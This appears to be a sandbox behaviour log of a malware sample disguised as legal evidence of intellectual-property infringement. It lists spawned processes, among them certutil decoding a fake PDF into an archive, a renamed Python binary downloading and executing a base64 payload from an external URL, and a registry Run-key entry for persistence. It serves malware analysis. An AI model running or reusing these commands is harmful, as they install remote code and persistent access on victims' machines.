Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1504 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1828 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --first-renderer-process --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=5213362510 --mojo-platform-channel-handle=2228 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=5213441251 --mojo-platform-channel-handle=2300 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=2340 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Service.~b64" "C:\Users\Public\Windows Service.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=5225407327 --mojo-platform-channel-handle=2916 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: unknown	Process created: C:\Windows\explorer.exe "C:\Windows\Explorer.EXE" C:\Users\Public\Windows Service.bat
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Service.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\OpenConsole.exe "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\OpenConsole.exe" -Embedding
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe" -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"
Source: unknown	Process created: C:\Windows\explorer.exe "C:\Windows\Explorer.EXE" C:\Users\Public\Windows Service.bat
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\Document.pdf"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\EFOYFBOLXA.png.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\GAOBCVIQIJ.png.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\IPKGELNTQY.docx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.docx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.pdf"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.docx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.xlsx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PALRGUCVEH.mp3.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PIVFAGEAAV.png.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PWCCAWLGRE.jpg.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.mp3.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.pdf"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.xlsx.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.jpg.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.mp3.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SUAVTZKNFL.pdf"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.jpg.cmd"	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.xlsx.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib -s -h -r VERSION.DLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode Document.pdf DzbIZ1HRMj.rar	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\Images.exe images x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\VIP4YmtQLN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Service.~b64" "C:\Users\Public\Windows Service.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\LSBIHQFDVT.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\QNCYCDFIJJ.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\SUAVTZKNFL.pdf"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\SUAVTZKNFL.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1672,i,12053433933964087944,11760444625678437277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=9644
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=8876
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1504 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=1828 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --first-renderer-process --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=5213362510 --mojo-platform-channel-handle=2228 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=5213441251 --mojo-platform-channel-handle=2300 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-US --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --mojo-platform-channel-handle=2340 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1" --no-sandbox --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=5225407327 --mojo-platform-channel-handle=2916 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=WebRtcHideLocalIpsWithMdns /prefetch:1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Service.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\VIP4YmtQLN\synaptics.exe "C:\Users\Public\VIP4YmtQLN\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL').text))"

Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
